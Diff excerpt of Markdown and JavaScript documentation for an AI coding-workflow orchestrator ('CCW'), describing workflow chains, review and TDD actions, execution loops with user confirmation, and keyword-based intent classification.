✅ **Ideal scenarios**:
- Adding a single feature (e.g. user avatar upload)
- Modifying existing functionality (e.g. updating form validation)
- Small refactors (e.g. extracting a shared helper)
- Adding test cases
- Documentation updates

❌ **Avoid when**:
- The implementation approach is uncertain
- The change spans multiple modules
- Architectural decisions are required
- Complex dependencies are involved

## Configuration

```javascript
const rapidConfig = {
  explorationThreshold: {
    // Force exploration if the task mentions specific files
    forceExplore: /\b(file|文件|module|模块|class|类)\s*[::]?\s*\w+/i,
    // Skip exploration for simple tasks
    skipExplore: /\b(add|添加|create|创建)\s+(comment|注释|log|日志)/i
  },

  defaultExecution: 'Agent',  // Agent for low complexity

  codeReview: {
    default: 'Skip',          // Skip review for simple tasks
    threshold: 'medium'       // Enable for medium+ complexity
  }
}
```
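
How these thresholds might gate exploration inside lite-plan, as a sketch; `shouldExplore` is illustrative, not an actual command API:

```javascript
// Sketch: decide whether lite-plan runs codebase exploration before planning.
function shouldExplore(taskText) {
  const { forceExplore, skipExplore } = rapidConfig.explorationThreshold
  if (skipExplore.test(taskText)) return false  // trivial additions (comments, logs) skip exploration
  if (forceExplore.test(taskText)) return true  // explicit file/module/class mentions force it
  return false                                  // rapid tasks default to no exploration
}

// shouldExplore('Optimize module: AuthService token refresh') → true
// shouldExplore('add comment to README')                      → false
```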

## Example Invocations

```bash
# Simple feature
ccw "Add a user logout button"
→ lite-plan → lite-execute (Agent)

# With exploration
ccw "Optimize the token refresh logic in AuthService"
→ lite-plan -e → lite-execute (Agent, Gemini review)

# Medium complexity
ccw "Implement local storage for user preference settings"
→ lite-plan -e → lite-execute (Codex)
```

## Output Artifacts

```
.workflow/.lite-plan/{task-slug}-{date}/
├── exploration-*.json           # If exploration was triggered
├── explorations-manifest.json
└── plan.json                    # Implementation plan
```
@@ -1,84 +0,0 @@
# Review-Fix Workflow Action

## Pattern

```
review-session-cycle → review-fix
```

## Trigger Conditions

- Keywords: "review", "审查", "检查代码", "code review", "质量检查"
- Scenarios: PR review, code quality improvement, security audits

## Execution Flow

```mermaid
graph TD
    A[User Input] --> B[review-session-cycle]
    B --> C{7-dimension analysis}
    C --> D[Security]
    C --> E[Performance]
    C --> F[Maintainability]
    C --> G[Architecture]
    C --> H[Code Style]
    C --> I[Test Coverage]
    C --> J[Documentation]
    D & E & F & G & H & I & J --> K[Findings Aggregation]
    K --> L{Quality Gate}
    L -->|Pass| M[Report Only]
    L -->|Fail| N[review-fix]
    N --> O[Auto Fix]
    O --> P[Re-verify]
```

## Configuration

| Parameter | Default | Description |
|------|--------|------|
| dimensions | all | Review dimensions (security, performance, etc.) |
| quality_gate | 80 | Quality gate score threshold |
| auto_fix | true | Automatically fix reported findings |
| severity_threshold | medium | Minimum severity to report |
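
The quality gate compares aggregated findings against the `quality_gate` score. A minimal sketch of that decision, assuming per-dimension scores in the 0-100 range (the scoring shape and `passesQualityGate` name are assumptions, not a documented API):

```javascript
// Sketch: aggregate dimension scores and decide whether review-fix is triggered.
function passesQualityGate(dimensionScores, qualityGate = 80) {
  const scores = Object.values(dimensionScores)
  const overall = scores.reduce((sum, s) => sum + s, 0) / scores.length
  return overall >= qualityGate  // Pass → report only; Fail → /workflow:review-fix
}

// passesQualityGate({ security: 60, performance: 85, maintainability: 90 })
// → average 78.3 < 80 → false → hand off to review-fix
```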

## CLI Integration

| Stage | CLI Hint | Purpose |
|------|----------|------|
| review-session-cycle | `gemini --mode analysis` | Multi-dimension deep analysis |
| review-fix | `codex --mode write` | Auto-fix findings |

## Slash Commands

```bash
/workflow:review-session-cycle    # Session-level code review
/workflow:review-module-cycle     # Module-level code review
/workflow:review-fix              # Auto-fix review findings
/workflow:review --type security  # Targeted security review
```

## Review Dimensions

| Dimension | Checks |
|------|--------|
| Security | Injection, XSS, sensitive data exposure |
| Performance | N+1 queries, memory leaks, algorithmic complexity |
| Maintainability | Code duplication, complexity, naming |
| Architecture | Dependency direction, layering violations, coupling |
| Code Style | Formatting, conventions, consistency |
| Test Coverage | Coverage rate, edge cases |
| Documentation | Comments, API docs, README |

## When to Use

- Pre-merge PR review
- Quality verification after refactoring
- Security compliance audits
- Technical debt assessment

## Risk Assessment

| Risk | Mitigation |
|------|----------|
| Too many false positives | Filter via severity_threshold |
| Fixes introduce new issues | Re-verify loop |
| Incomplete review coverage | 7-dimension coverage |
@@ -1,66 +0,0 @@
# TDD Workflow Action

## Pattern

```
tdd-plan → execute → tdd-verify
```

## Trigger Conditions

- Keywords: "tdd", "test-driven", "测试驱动", "先写测试", "red-green"
- Scenarios: code that needs strong quality guarantees, critical business logic, high regression risk

## Execution Flow

```mermaid
graph TD
    A[User Input] --> B[tdd-plan]
    B --> C{Generate test task chain}
    C --> D[Red Phase: write failing tests]
    D --> E[execute: implement code]
    E --> F[Green Phase: tests pass]
    F --> G{Refactor needed?}
    G -->|Yes| H[Refactor Phase]
    H --> F
    G -->|No| I[tdd-verify]
    I --> J[Quality report]
```

## Configuration

| Parameter | Default | Description |
|------|--------|------|
| coverage_target | 80% | Target test coverage |
| cycle_limit | 10 | Maximum Red-Green-Refactor cycles |
| strict_mode | false | Strict mode (tests must fail before they pass) |
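
A minimal sketch of how `cycle_limit` and `strict_mode` might be enforced around the execute phase; `runTests()`, `implement()`, and `refactor()` are hypothetical stand-ins for the underlying commands:

```javascript
// Sketch: Red-Green-Refactor loop with the cycle_limit guard described above.
async function tddCycle(task, { cycle_limit = 10, strict_mode = false } = {}) {
  for (let cycle = 1; cycle <= cycle_limit; cycle++) {
    const red = await runTests(task)                // Red: the new tests should fail first
    if (strict_mode && red.passed) {
      throw new Error('strict_mode: tests passed before any implementation')
    }
    await implement(task)                           // Green: write just enough code
    const green = await runTests(task)
    if (green.passed) {
      await refactor(task)                          // Refactor, then hand off to tdd-verify
      return { cycles: cycle, passed: true }
    }
  }
  return { cycles: cycle_limit, passed: false }     // limit reached → surfaced in the quality report
}
```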

## CLI Integration

| Stage | CLI Hint | Purpose |
|------|----------|------|
| tdd-plan | `gemini --mode analysis` | Analyze the test strategy |
| execute | `codex --mode write` | Implement the code |
| tdd-verify | `gemini --mode analysis` | Verify TDD compliance |

## Slash Commands

```bash
/workflow:tdd-plan      # Generate the TDD task chain
/workflow:execute       # Run the Red-Green-Refactor cycle
/workflow:tdd-verify    # Verify TDD compliance + coverage
```

## When to Use

- Core business logic development
- Modules that require high test coverage
- Refactoring existing code without breaking behavior
- Teams that mandate TDD practice

## Risk Assessment

| Risk | Mitigation |
|------|----------|
| Poorly chosen test granularity | Evaluate test boundaries during tdd-plan |
| Over-testing | Focus on behavior rather than implementation |
| Too many cycles | Capped by cycle_limit |
@@ -1,79 +0,0 @@
# UI Design Workflow Action

## Pattern

```
ui-design:[explore|imitate]-auto → design-sync → plan → execute
```

## Trigger Conditions

- Keywords: "ui", "界面", "design", "组件", "样式", "布局", "前端"
- Variant triggers:
  - `imitate`: "参考", "模仿", "像", "类似"
  - `explore`: default when no specific reference is given

## Variants

### Explore (exploratory design)

```mermaid
graph TD
    A[User Input] --> B[ui-design:explore-auto]
    B --> C[Design system analysis]
    C --> D[Component structure planning]
    D --> E[design-sync]
    E --> F[plan]
    F --> G[execute]
```

### Imitate (reference-based design)

```mermaid
graph TD
    A[User Input + Reference] --> B[ui-design:imitate-auto]
    B --> C[Reference analysis]
    C --> D[Style extraction]
    D --> E[design-sync]
    E --> F[plan]
    F --> G[execute]
```

## Configuration

| Parameter | Default | Description |
|------|--------|------|
| design_system | auto | Design system (auto/tailwind/mui/custom) |
| responsive | true | Responsive design |
| accessibility | true | Accessibility support |
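
One way `design_system: auto` might be resolved before design-sync runs, sketched here by inspecting package.json dependencies; the detection list is an assumption, not documented behavior, and `Read()` follows the same tool-call convention used elsewhere in these docs:

```javascript
// Sketch: resolve design_system 'auto' from the project's dependencies.
function resolveDesignSystem(config) {
  if (config.design_system !== 'auto') return config.design_system
  const pkg = JSON.parse(Read('package.json'))
  const deps = { ...pkg.dependencies, ...pkg.devDependencies }
  if (deps['tailwindcss']) return 'tailwind'
  if (deps['@mui/material']) return 'mui'
  return 'custom'  // fall back to project-specific styling
}
```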

## CLI Integration

| Stage | CLI Hint | Purpose |
|------|----------|------|
| explore/imitate | `gemini --mode analysis` | Design analysis, style extraction |
| design-sync | - | Sync design decisions with the codebase |
| plan | - | Built-in planning |
| execute | `codex --mode write` | Component implementation |

## Slash Commands

```bash
/workflow:ui-design:explore-auto    # Exploratory UI design
/workflow:ui-design:imitate-auto    # Reference-based UI design
/workflow:ui-design:design-sync     # Sync design with code (key step)
/workflow:ui-design:style-extract   # Extract existing styles
/workflow:ui-design:codify-style    # Codify styles
```

## When to Use

- New page/component development
- UI refactoring or modernization
- Establishing a design system
- Drawing on another product's design

## Risk Assessment

| Risk | Mitigation |
|------|----------|
| Inconsistent design | style-extract enforces reuse |
| Responsive issues | Verify across multiple breakpoints |
| Missing accessibility | Integrated a11y checks |
@@ -1,435 +0,0 @@
|
||||
# CCW Orchestrator
|
||||
|
||||
Stateless orchestrator: analyze input → select a workflow chain → execute with TODO tracking
|
||||
|
||||
## Architecture
|
||||
|
||||
```
|
||||
┌──────────────────────────────────────────────────────────────────┐
|
||||
│ CCW Orchestrator │
|
||||
├──────────────────────────────────────────────────────────────────┤
|
||||
│ │
|
||||
│ Phase 1: Input Analysis │
|
||||
│ ├─ Parse input (natural language / explicit command) │
|
||||
│ ├─ Classify intent (bugfix / feature / issue / ui / docs) │
|
||||
│ └─ Assess complexity (low / medium / high) │
|
||||
│ │
|
||||
│ Phase 2: Chain Selection │
|
||||
│ ├─ Load index/workflow-chains.json │
|
||||
│ ├─ Match intent → chain(s) │
|
||||
│ ├─ Filter by complexity │
|
||||
│ └─ Select optimal chain │
|
||||
│ │
|
||||
│ Phase 3: User Confirmation (optional) │
|
||||
│ ├─ Display selected chain and steps │
|
||||
│ └─ Allow modification or manual selection │
|
||||
│ │
|
||||
│ Phase 4: TODO Tracking Setup │
|
||||
│ ├─ Create TodoWrite with chain steps │
|
||||
│ └─ Mark first step as in_progress │
|
||||
│ │
|
||||
│ Phase 5: Execution Loop │
|
||||
│ ├─ Execute current step (SlashCommand) │
|
||||
│ ├─ Update TODO status (completed) │
|
||||
│ ├─ Check auto_continue flag │
|
||||
│ └─ Proceed to next step or wait for user │
|
||||
│ │
|
||||
└──────────────────────────────────────────────────────────────────┘
|
||||
```
|
||||
|
||||
## Implementation
|
||||
|
||||
### Phase 1: Input Analysis
|
||||
|
||||
```javascript
|
||||
// Load external configuration (externalized for flexibility)
|
||||
const intentRules = JSON.parse(Read('.claude/skills/ccw/index/intent-rules.json'))
|
||||
const capabilities = JSON.parse(Read('.claude/skills/ccw/index/command-capabilities.json'))
|
||||
|
||||
function analyzeInput(userInput) {
|
||||
const input = userInput.trim()
|
||||
|
||||
// Check for explicit command passthrough
|
||||
if (input.match(/^\/(?:workflow|issue|memory|task):/)) {
|
||||
return { type: 'explicit', command: input, passthrough: true }
|
||||
}
|
||||
|
||||
// Classify intent using external rules
|
||||
const intent = classifyIntent(input, intentRules.intent_patterns)
|
||||
|
||||
// Assess complexity using external indicators
|
||||
const complexity = assessComplexity(input, intentRules.complexity_indicators)
|
||||
|
||||
// Detect tool preferences using external triggers
|
||||
const toolPreference = detectToolPreference(input, intentRules.cli_tool_triggers)
|
||||
|
||||
return {
|
||||
type: 'natural',
|
||||
text: input,
|
||||
intent,
|
||||
complexity,
|
||||
toolPreference,
|
||||
passthrough: false
|
||||
}
|
||||
}
|
||||
|
||||
function classifyIntent(text, patterns) {
|
||||
// Sort by priority
|
||||
const sorted = Object.entries(patterns)
|
||||
.sort((a, b) => a[1].priority - b[1].priority)
|
||||
|
||||
for (const [intentType, config] of sorted) {
|
||||
// Handle variants (bugfix, ui, docs)
|
||||
if (config.variants) {
|
||||
for (const [variant, variantConfig] of Object.entries(config.variants)) {
|
||||
const variantPatterns = variantConfig.patterns || variantConfig.triggers || []
|
||||
if (matchesAnyPattern(text, variantPatterns)) {
|
||||
// For bugfix, check if standard patterns also match
|
||||
if (intentType === 'bugfix') {
|
||||
const standardMatch = matchesAnyPattern(text, config.variants.standard?.patterns || [])
|
||||
if (standardMatch) {
|
||||
return { type: intentType, variant, workflow: variantConfig.workflow }
|
||||
}
|
||||
} else {
|
||||
return { type: intentType, variant, workflow: variantConfig.workflow }
|
||||
}
|
||||
}
|
||||
}
|
||||
// Check default variant
|
||||
if (config.variants.standard) {
|
||||
if (matchesAnyPattern(text, config.variants.standard.patterns)) {
|
||||
return { type: intentType, variant: 'standard', workflow: config.variants.standard.workflow }
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Handle simple patterns (exploration, tdd, review)
|
||||
if (config.patterns && !config.require_both) {
|
||||
if (matchesAnyPattern(text, config.patterns)) {
|
||||
return { type: intentType, workflow: config.workflow }
|
||||
}
|
||||
}
|
||||
|
||||
// Handle dual-pattern matching (issue_batch)
|
||||
if (config.require_both && config.patterns) {
|
||||
const matchBatch = matchesAnyPattern(text, config.patterns.batch_keywords)
|
||||
const matchAction = matchesAnyPattern(text, config.patterns.action_keywords)
|
||||
if (matchBatch && matchAction) {
|
||||
return { type: intentType, workflow: config.workflow }
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Default to feature
|
||||
return { type: 'feature' }
|
||||
}
|
||||
|
||||
function matchesAnyPattern(text, patterns) {
|
||||
if (!Array.isArray(patterns)) return false
|
||||
const lowerText = text.toLowerCase()
|
||||
return patterns.some(p => lowerText.includes(p.toLowerCase()))
|
||||
}
|
||||
|
||||
function assessComplexity(text, indicators) {
|
||||
let score = 0
|
||||
|
||||
for (const [level, config] of Object.entries(indicators)) {
|
||||
if (config.patterns) {
|
||||
for (const [category, patternConfig] of Object.entries(config.patterns)) {
|
||||
if (matchesAnyPattern(text, patternConfig.keywords)) {
|
||||
score += patternConfig.weight || 1
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if (score >= indicators.high.score_threshold) return 'high'
|
||||
if (score >= indicators.medium.score_threshold) return 'medium'
|
||||
return 'low'
|
||||
}
|
||||
|
||||
function detectToolPreference(text, triggers) {
|
||||
for (const [tool, config] of Object.entries(triggers)) {
|
||||
// Check explicit triggers
|
||||
if (matchesAnyPattern(text, config.explicit)) return tool
|
||||
// Check semantic triggers
|
||||
if (matchesAnyPattern(text, config.semantic)) return tool
|
||||
}
|
||||
return null
|
||||
}
|
||||
```
|
||||
|
||||
### Phase 2: Chain Selection
|
||||
|
||||
```javascript
|
||||
// Load workflow chains index
|
||||
const chains = JSON.parse(Read('.claude/skills/ccw/index/workflow-chains.json'))
|
||||
|
||||
function selectChain(analysis) {
|
||||
const { intent, complexity } = analysis
|
||||
|
||||
// Map intent type (from intent-rules.json) to chain ID (from workflow-chains.json)
|
||||
const chainMapping = {
|
||||
'bugfix': 'bugfix',
|
||||
'issue_batch': 'issue', // intent-rules.json key → chains.json chain ID
|
||||
'exploration': 'full',
|
||||
'ui_design': 'ui', // intent-rules.json key → chains.json chain ID
|
||||
'tdd': 'tdd',
|
||||
'review': 'review-fix',
|
||||
'documentation': 'docs', // intent-rules.json key → chains.json chain ID
|
||||
'feature': null // Use complexity fallback
|
||||
}
|
||||
|
||||
let chainId = chainMapping[intent.type]
|
||||
|
||||
// Fallback to complexity-based selection
|
||||
if (!chainId) {
|
||||
chainId = chains.chain_selection_rules.complexity_fallback[complexity]
|
||||
}
|
||||
|
||||
const chain = chains.chains[chainId]
|
||||
|
||||
// Handle variants
|
||||
let steps = chain.steps
|
||||
if (chain.variants) {
|
||||
const variant = intent.variant || Object.keys(chain.variants)[0]
|
||||
steps = chain.variants[variant].steps
|
||||
}
|
||||
|
||||
return {
|
||||
id: chainId,
|
||||
name: chain.name,
|
||||
description: chain.description,
|
||||
steps,
|
||||
complexity: chain.complexity,
|
||||
estimated_time: chain.estimated_time
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### Phase 3: User Confirmation
|
||||
|
||||
```javascript
|
||||
function confirmChain(selectedChain, analysis) {
|
||||
// Skip confirmation for simple chains
|
||||
if (selectedChain.steps.length <= 2 && analysis.complexity === 'low') {
|
||||
return selectedChain
|
||||
}
|
||||
|
||||
console.log(`
|
||||
## CCW Workflow Selection
|
||||
|
||||
**Task**: ${analysis.text.substring(0, 80)}...
|
||||
**Intent**: ${analysis.intent.type}${analysis.intent.variant ? ` (${analysis.intent.variant})` : ''}
|
||||
**Complexity**: ${analysis.complexity}
|
||||
|
||||
**Selected Chain**: ${selectedChain.name}
|
||||
**Description**: ${selectedChain.description}
|
||||
**Estimated Time**: ${selectedChain.estimated_time}
|
||||
|
||||
**Steps**:
|
||||
${selectedChain.steps.map((s, i) => `${i + 1}. ${s.command}${s.optional ? ' (optional)' : ''}`).join('\n')}
|
||||
`)
|
||||
|
||||
const response = AskUserQuestion({
|
||||
questions: [{
|
||||
question: `Proceed with ${selectedChain.name}?`,
|
||||
header: "Confirm",
|
||||
multiSelect: false,
|
||||
options: [
|
||||
{ label: "Proceed", description: `Execute ${selectedChain.steps.length} steps` },
|
||||
{ label: "Rapid", description: "Use lite-plan → lite-execute" },
|
||||
{ label: "Full", description: "Use brainstorm → plan → execute" },
|
||||
{ label: "Manual", description: "Specify commands manually" }
|
||||
]
|
||||
}]
|
||||
})
|
||||
|
||||
// Handle alternative selection
|
||||
if (response.Confirm === 'Rapid') {
|
||||
return selectChain({ intent: { type: 'feature' }, complexity: 'low' })
|
||||
}
|
||||
if (response.Confirm === 'Full') {
|
||||
return chains.chains['full']
|
||||
}
|
||||
if (response.Confirm === 'Manual') {
|
||||
return null // User will specify
|
||||
}
|
||||
|
||||
return selectedChain
|
||||
}
|
||||
```
|
||||
|
||||
### Phase 4: TODO Tracking Setup
|
||||
|
||||
```javascript
|
||||
function setupTodoTracking(chain, analysis) {
|
||||
const todos = chain.steps.map((step, index) => ({
|
||||
content: `[${index + 1}/${chain.steps.length}] ${step.command}`,
|
||||
status: index === 0 ? 'in_progress' : 'pending',
|
||||
activeForm: `Executing ${step.command}`
|
||||
}))
|
||||
|
||||
// Add header todo
|
||||
todos.unshift({
|
||||
content: `CCW: ${chain.name} (${chain.steps.length} steps)`,
|
||||
status: 'in_progress',
|
||||
activeForm: `Running ${chain.name} workflow`
|
||||
})
|
||||
|
||||
TodoWrite({ todos })
|
||||
|
||||
return {
|
||||
chain,
|
||||
currentStep: 0,
|
||||
todos
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### Phase 5: Execution Loop
|
||||
|
||||
```javascript
|
||||
async function executeChain(execution, analysis) {
|
||||
const { chain, todos } = execution
|
||||
let currentStep = 0
|
||||
|
||||
while (currentStep < chain.steps.length) {
|
||||
const step = chain.steps[currentStep]
|
||||
|
||||
// Update TODO: mark current as in_progress
|
||||
const updatedTodos = todos.map((t, i) => ({
|
||||
...t,
|
||||
status: i === 0
|
||||
? 'in_progress'
|
||||
: i === currentStep + 1
|
||||
? 'in_progress'
|
||||
: i <= currentStep
|
||||
? 'completed'
|
||||
: 'pending'
|
||||
}))
|
||||
TodoWrite({ todos: updatedTodos })
|
||||
|
||||
console.log(`\n### Step ${currentStep + 1}/${chain.steps.length}: ${step.command}\n`)
|
||||
|
||||
// Check for confirmation requirement
|
||||
if (step.confirm_before) {
|
||||
const proceed = AskUserQuestion({
|
||||
questions: [{
|
||||
question: `Ready to execute ${step.command}?`,
|
||||
header: "Step",
|
||||
multiSelect: false,
|
||||
options: [
|
||||
{ label: "Execute", description: "Run this step" },
|
||||
{ label: "Skip", description: "Skip to next step" },
|
||||
{ label: "Abort", description: "Stop workflow" }
|
||||
]
|
||||
}]
|
||||
})
|
||||
|
||||
if (proceed.Step === 'Skip') {
|
||||
currentStep++
|
||||
continue
|
||||
}
|
||||
if (proceed.Step === 'Abort') {
|
||||
break
|
||||
}
|
||||
}
|
||||
|
||||
// Execute the command
|
||||
const args = analysis.text
|
||||
SlashCommand(step.command, { args })
|
||||
|
||||
// Mark step as completed
|
||||
updatedTodos[currentStep + 1].status = 'completed'
|
||||
TodoWrite({ todos: updatedTodos })
|
||||
|
||||
currentStep++
|
||||
|
||||
// Check auto_continue
|
||||
if (!step.auto_continue && currentStep < chain.steps.length) {
|
||||
console.log(`
|
||||
Step completed. Next: ${chain.steps[currentStep].command}
|
||||
Type "continue" to proceed or specify different action.
|
||||
`)
|
||||
// Wait for user input before continuing
|
||||
break
|
||||
}
|
||||
}
|
||||
|
||||
// Final status
|
||||
if (currentStep >= chain.steps.length) {
|
||||
const finalTodos = todos.map(t => ({ ...t, status: 'completed' }))
|
||||
TodoWrite({ todos: finalTodos })
|
||||
|
||||
console.log(`\n✓ ${chain.name} workflow completed (${chain.steps.length} steps)`)
|
||||
}
|
||||
|
||||
return { completed: currentStep, total: chain.steps.length }
|
||||
}
|
||||
```
|
||||
|
||||
## Main Orchestration Entry
|
||||
|
||||
```javascript
|
||||
async function ccwOrchestrate(userInput) {
|
||||
console.log('## CCW Orchestrator\n')
|
||||
|
||||
// Phase 1: Analyze input
|
||||
const analysis = analyzeInput(userInput)
|
||||
|
||||
// Handle explicit command passthrough
|
||||
if (analysis.passthrough) {
|
||||
console.log(`Direct command: ${analysis.command}`)
|
||||
return SlashCommand(analysis.command)
|
||||
}
|
||||
|
||||
// Phase 2: Select chain
|
||||
const selectedChain = selectChain(analysis)
|
||||
|
||||
// Phase 3: Confirm (for complex workflows)
|
||||
const confirmedChain = confirmChain(selectedChain, analysis)
|
||||
if (!confirmedChain) {
|
||||
console.log('Manual mode selected. Specify commands directly.')
|
||||
return
|
||||
}
|
||||
|
||||
// Phase 4: Setup TODO tracking
|
||||
const execution = setupTodoTracking(confirmedChain, analysis)
|
||||
|
||||
// Phase 5: Execute
|
||||
const result = await executeChain(execution, analysis)
|
||||
|
||||
return result
|
||||
}
|
||||
```
|
||||
|
||||
## Decision Matrix
|
||||
|
||||
| Intent | Complexity | Chain | Steps |
|
||||
|--------|------------|-------|-------|
|
||||
| bugfix (standard) | * | bugfix | lite-fix |
|
||||
| bugfix (hotfix) | * | bugfix | lite-fix --hotfix |
|
||||
| issue | * | issue | plan → queue → execute |
|
||||
| exploration | * | full | brainstorm → plan → execute |
|
||||
| ui (explore) | * | ui | ui-design:explore → sync → plan → execute |
|
||||
| ui (imitate) | * | ui | ui-design:imitate → sync → plan → execute |
|
||||
| tdd | * | tdd | tdd-plan → execute → tdd-verify |
|
||||
| review | * | review-fix | review-session-cycle → review-fix |
|
||||
| docs | low | docs | update-related |
|
||||
| docs | medium+ | docs | docs → execute |
|
||||
| feature | low | rapid | lite-plan → lite-execute |
|
||||
| feature | medium | coupled | plan → verify → execute |
|
||||
| feature | high | full | brainstorm → plan → execute |
|
||||
|
||||
## Continuation Commands
|
||||
|
||||
After each step pause, user input is mapped to an action (a minimal handling sketch follows the table):
|
||||
|
||||
| User Input | Action |
|
||||
|------------|--------|
|
||||
| `continue` | Execute next step |
|
||||
| `skip` | Skip current step |
|
||||
| `abort` | Stop workflow |
|
||||
| `/workflow:*` | Execute specific command |
|
||||
| Natural language | Re-analyze and potentially switch chains |
|
||||
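
A hedged sketch of how those continuation inputs could be dispatched; `handleContinuation` is illustrative and only covers the behaviors listed in the table:

```javascript
// Sketch only: dispatch pause-time user input to the orchestrator actions above.
function handleContinuation(userInput, execution, analysis) {
  const input = userInput.trim()
  if (/^\/(?:workflow|issue|memory|task):/.test(input)) return SlashCommand(input)  // explicit command
  if (input.toLowerCase() === 'abort') return { aborted: true }
  if (input.toLowerCase() === 'skip') execution.currentStep++        // drop the paused step
  if (['continue', 'skip'].includes(input.toLowerCase())) {
    // assumes executeChain honors execution.currentStep when resuming
    return executeChain(execution, analysis)
  }
  return ccwOrchestrate(input)                                       // natural language → re-analyze intent
}
```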
@@ -1,336 +0,0 @@
|
||||
# Intent Classification Specification
|
||||
|
||||
CCW intent classification spec: how task intent is recognized from user input and the optimal workflow is selected.
|
||||
|
||||
## Classification Hierarchy
|
||||
|
||||
```
|
||||
Intent Classification
|
||||
├── Priority 1: Explicit Commands
|
||||
│ └── /workflow:*, /issue:*, /memory:*, /task:*
|
||||
├── Priority 2: Bug Keywords
|
||||
│ ├── Hotfix: urgent + bug keywords
|
||||
│ └── Standard: bug keywords only
|
||||
├── Priority 3: Issue Batch
|
||||
│ └── Multiple + fix keywords
|
||||
├── Priority 4: Exploration
|
||||
│ └── Uncertainty keywords
|
||||
├── Priority 5: UI/Design
|
||||
│ └── Visual/component keywords
|
||||
└── Priority 6: Complexity Fallback
|
||||
├── High → Coupled
|
||||
├── Medium → Rapid
|
||||
└── Low → Rapid
|
||||
```
|
||||
|
||||
## Keyword Patterns
|
||||
|
||||
### Bug Detection
|
||||
|
||||
```javascript
|
||||
const BUG_PATTERNS = {
|
||||
core: /\b(fix|bug|error|issue|crash|broken|fail|wrong|incorrect|修复|报错|错误|问题|异常|崩溃|失败)\b/i,
|
||||
|
||||
urgency: /\b(hotfix|urgent|production|critical|emergency|asap|immediately|紧急|生产|线上|马上|立即)\b/i,
|
||||
|
||||
symptoms: /\b(not working|doesn't work|can't|cannot|won't|stopped|stopped working|无法|不能|不工作)\b/i,
|
||||
|
||||
errors: /\b(\d{3}\s*error|exception|stack\s*trace|undefined|null\s*pointer|timeout)\b/i
|
||||
}
|
||||
|
||||
function detectBug(text) {
|
||||
const isBug = BUG_PATTERNS.core.test(text) || BUG_PATTERNS.symptoms.test(text)
|
||||
const isUrgent = BUG_PATTERNS.urgency.test(text)
|
||||
const hasError = BUG_PATTERNS.errors.test(text)
|
||||
|
||||
if (!isBug && !hasError) return null
|
||||
|
||||
return {
|
||||
type: 'bugfix',
|
||||
mode: isUrgent ? 'hotfix' : 'standard',
|
||||
confidence: (isBug && hasError) ? 'high' : 'medium'
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### Issue Batch Detection
|
||||
|
||||
```javascript
|
||||
const ISSUE_PATTERNS = {
|
||||
batch: /\b(issues?|batch|queue|multiple|several|all|多个|批量|一系列|所有|这些)\b/i,
|
||||
action: /\b(fix|resolve|handle|process|处理|解决|修复)\b/i,
|
||||
source: /\b(github|jira|linear|backlog|todo|待办)\b/i
|
||||
}
|
||||
|
||||
function detectIssueBatch(text) {
|
||||
const hasBatch = ISSUE_PATTERNS.batch.test(text)
|
||||
const hasAction = ISSUE_PATTERNS.action.test(text)
|
||||
const hasSource = ISSUE_PATTERNS.source.test(text)
|
||||
|
||||
if (hasBatch && hasAction) {
|
||||
return {
|
||||
type: 'issue',
|
||||
confidence: hasSource ? 'high' : 'medium'
|
||||
}
|
||||
}
|
||||
return null
|
||||
}
|
||||
```
|
||||
|
||||
### Exploration Detection
|
||||
|
||||
```javascript
|
||||
const EXPLORATION_PATTERNS = {
|
||||
uncertainty: /\b(不确定|不知道|not sure|unsure|how to|怎么|如何|what if|should i|could i|是否应该)\b/i,
|
||||
|
||||
exploration: /\b(explore|research|investigate|分析|研究|调研|评估|探索|了解)\b/i,
|
||||
|
||||
options: /\b(options|alternatives|approaches|方案|选择|方向|可能性)\b/i,
|
||||
|
||||
questions: /\b(what|which|how|why|什么|哪个|怎样|为什么)\b.*\?/i
|
||||
}
|
||||
|
||||
function detectExploration(text) {
|
||||
const hasUncertainty = EXPLORATION_PATTERNS.uncertainty.test(text)
|
||||
const hasExploration = EXPLORATION_PATTERNS.exploration.test(text)
|
||||
const hasOptions = EXPLORATION_PATTERNS.options.test(text)
|
||||
const hasQuestion = EXPLORATION_PATTERNS.questions.test(text)
|
||||
|
||||
const score = [hasUncertainty, hasExploration, hasOptions, hasQuestion].filter(Boolean).length
|
||||
|
||||
if (score >= 2 || hasUncertainty) {
|
||||
return {
|
||||
type: 'exploration',
|
||||
confidence: score >= 3 ? 'high' : 'medium'
|
||||
}
|
||||
}
|
||||
return null
|
||||
}
|
||||
```
|
||||
|
||||
### UI/Design Detection
|
||||
|
||||
```javascript
|
||||
const UI_PATTERNS = {
|
||||
components: /\b(ui|界面|component|组件|button|按钮|form|表单|modal|弹窗|dialog|对话框)\b/i,
|
||||
|
||||
design: /\b(design|设计|style|样式|layout|布局|theme|主题|color|颜色)\b/i,
|
||||
|
||||
visual: /\b(visual|视觉|animation|动画|responsive|响应式|mobile|移动端)\b/i,
|
||||
|
||||
frontend: /\b(frontend|前端|react|vue|angular|css|html|page|页面)\b/i
|
||||
}
|
||||
|
||||
function detectUI(text) {
|
||||
const hasComponents = UI_PATTERNS.components.test(text)
|
||||
const hasDesign = UI_PATTERNS.design.test(text)
|
||||
const hasVisual = UI_PATTERNS.visual.test(text)
|
||||
const hasFrontend = UI_PATTERNS.frontend.test(text)
|
||||
|
||||
const score = [hasComponents, hasDesign, hasVisual, hasFrontend].filter(Boolean).length
|
||||
|
||||
if (score >= 2) {
|
||||
return {
|
||||
type: 'ui',
|
||||
hasReference: /参考|reference|based on|像|like|模仿|imitate/.test(text),
|
||||
confidence: score >= 3 ? 'high' : 'medium'
|
||||
}
|
||||
}
|
||||
return null
|
||||
}
|
||||
```
|
||||
|
||||
## Complexity Assessment
|
||||
|
||||
### Indicators
|
||||
|
||||
```javascript
|
||||
const COMPLEXITY_INDICATORS = {
|
||||
high: {
|
||||
patterns: [
|
||||
/\b(refactor|重构|restructure|重新组织)\b/i,
|
||||
/\b(migrate|迁移|upgrade|升级|convert|转换)\b/i,
|
||||
/\b(architect|架构|system|系统|infrastructure|基础设施)\b/i,
|
||||
/\b(entire|整个|complete|完整|all\s+modules?|所有模块)\b/i,
|
||||
/\b(security|安全|scale|扩展|performance\s+critical|性能关键)\b/i,
|
||||
/\b(distributed|分布式|microservice|微服务|cluster|集群)\b/i
|
||||
],
|
||||
weight: 2
|
||||
},
|
||||
|
||||
medium: {
|
||||
patterns: [
|
||||
